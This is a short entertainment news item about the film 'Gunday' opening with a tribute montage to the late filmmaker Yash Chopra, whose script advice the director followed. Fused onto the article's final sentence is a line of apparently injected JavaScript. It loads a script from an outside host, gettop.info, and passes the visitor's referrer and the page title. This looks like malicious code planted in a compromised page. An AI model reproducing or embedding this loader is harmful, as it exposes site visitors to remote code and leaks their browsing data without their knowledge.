Director Ali Abbas Zafar’s upcoming venture ‘Gunday’ has released and the movie will pay tribute to late filmmaker Yash Chopra with a 60 second montage at the beginning.
Yash Chopra, the legendary director passed away in 2012 and ‘Gunday’ was the last script he had heard.
It was completely Zafar’s idea to put in a tribute to the legendary filmmaker, known for directing great movies like ‘Deewaar’, ‘Kabhi Kabhie’ and ‘Chandni’.
Yash Chopra gave his inputs and suggestions to the director regarding the script of ‘Gunday’. He gave him useful tips like, shooting the coal mine scenes at the actual locations and not recreate it here. The director simply took his useful insights and followed his orders.
“It was Ali Abbas Zafar’s idea, he was very, very keen as this was Yashji’s last script that he had heard. This was an emotional moment for Ali,” said a source from Yash Raj Films, which has produced ‘Gunday’ as well.
The film features Ranveer Singh, Arjun Kapoor and Priyanka Chopra.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
